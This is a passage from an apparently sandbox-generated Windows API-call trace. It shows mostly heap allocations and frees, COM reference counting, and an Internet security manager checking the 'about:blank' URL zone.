[2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf9cc | out: ppvObject=0x2cf9cc*=0x43bc54) returned 0x0 [0077.167] IUnknown:Release (This=0x43bc54) returned 0x3 [0077.167] IUnknown:AddRef (This=0x43bc54) returned 0x4 [0077.167] IUnknown:Release (This=0x43bc54) returned 0x3 [0077.167] IUri:IsEqual (in: This=0x43bfcc, pUri=0x43bc54, pfEqual=0x2cfa0c | out: pfEqual=0x2cfa0c*=0) returned 0x0 [0077.167] IUnknown:Release (This=0x43bfcc) returned 0x2 [0077.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.167] IUnknown:AddRef (This=0x43bc54) returned 0x4 [0077.167] IUri:GetAbsoluteUri (in: This=0x43bc54, pbstrAbsoluteUri=0x445a88 | out: pbstrAbsoluteUri=0x445a88*="about:blank") returned 0x0 [0077.167] IUnknown:Release (This=0x43bc54) returned 0x3 [0077.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.167] GetCurrentProcessId () returned 0x358 [0077.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43fa70 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4294f0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43fa88 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.168] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43faa0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ca00 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4458f8 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43baf0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44c9a8 | out: hHeap=0x410000) returned 1 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4613b0 | out: hHeap=0x410000) returned 1 [0077.169] IUnknown:Release (This=0x43c254) returned 0x4 [0077.169] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d878 | out: hHeap=0x410000) returned 1 [0077.170] IUnknown:Release (This=0x43c254) returned 0x3 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452180 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424338 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4522b8 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4520e8 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f9e0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451fc0 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451c00 | out: hHeap=0x410000) returned 1 [0077.170] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x459d78 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c268 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46be68 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45f3c8 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a970 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4539d8 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a1e0 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c2a0 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faa0 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c2d8 | out: hHeap=0x410000) returned 1 [0077.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fa48 | out: hHeap=0x410000) returned 1 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453918 | out: hHeap=0x410000) returned 1 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453948 | out: hHeap=0x410000) returned 1 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f9f0 | out: hHeap=0x410000) returned 1 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4538e8 | out: hHeap=0x410000) returned 1 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4336b8 | out: hHeap=0x410000) returned 1 [0077.172] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44f9f0 [0077.172] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f9e0 [0077.172] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4) returned 0x4613b0 [0077.172] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44fa48 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fa48 | out: hHeap=0x410000) returned 1 [0077.172] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.172] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x4436fc, dwReserved=0x0 | out: ppSM=0x4436fc*=0x461810) returned 0x0 [0077.173] IInternetSecurityManager:SetSecuritySite (This=0x461810, pSite=0x443704) returned 0x0 [0077.173] IUnknown:AddRef (This=0x443704) returned 0x31 [0077.173] IUnknown:QueryInterface (in: This=0x443704, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2cf6a4 | out: ppvObject=0x2cf6a4*=0x443708) returned 0x0 [0077.173] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x461838 | out: ppvObject=0x461838*=0x0) returned 0x80004002 [0077.173] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x461834 | out: ppvObject=0x461834*=0x0) returned 0x80004002 [0077.173] IServiceProvider:QueryService (in: This=0x443708, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x461830 | out: ppvObject=0x461830*=0x750296bc) returned 0x0 [0077.173] IUnknown:Release (This=0x443708) returned 0x0 [0077.173] IUnknown:AddRef (This=0x43bc54) returned 0x4 [0077.173] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="about:blank", pdwZone=0x2cf6dc, dwFlags=0x0 | out: pdwZone=0x2cf6dc*=0xffffffff) returned 0x800c0011 [0077.173] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0077.173] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0077.173] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0077.173] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x2cf6e0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x2cf6e0*=0x0) returned 0x0 [0077.173] IUnknown:Release (This=0x43bc54) returned 0x3 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a588 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f520 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.174] IUnknown:Release (This=0x4206a8) returned 0x1 [0077.174] IUnknown:Release (This=0x43bc54) returned 0x2 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445a88 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45db80 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44a740 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453858 | out: hHeap=0x410000) returned 1 [0077.174] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8f) returned 0x46be68 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46be68 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451c00 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4336b8 | out: hHeap=0x410000) returned 1 [0077.174] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461878 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45ef90 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4530d0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451f28 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45ef48 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453090 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43eeb0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4708c8 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444a90 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451e90 | out: hHeap=0x410000) returned 1 [0077.175] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x433558 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x444be0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4242f0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4336f8 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d840 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470808 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fb88 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fba8 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fbc8 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fbe8 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fc08 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fc28 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fc48 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fc68 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fc88 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fca8 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fcc8 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.176] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fce8 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473240 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d8e8 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x433538 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.177] LsDestroyContext () returned 0x0 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453978 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47b338 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4539a8 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46c678 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472190 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47b628 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45f380 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4721e0 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4721b8 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472208 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472230 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47b6d0 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4613c0 | out: hHeap=0x410000) returned 1 [0077.177] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4613d0 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4613e0 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4613f0 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47bad8 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47bc08 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47bd30 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47be40 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x468a28 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c1f8 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c2c8 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x422038 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fde8 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca70 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a5b8 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d130 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c558 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c6f8 | out: hHeap=0x410000) returned 1 [0077.178] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c7c8 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb50 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c460 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47bf78 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47c960 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47acc0 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4737f0 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d3b0 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47e908 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47e848 | out: hHeap=0x410000) returned 1 [0077.179] HeapFree (in: 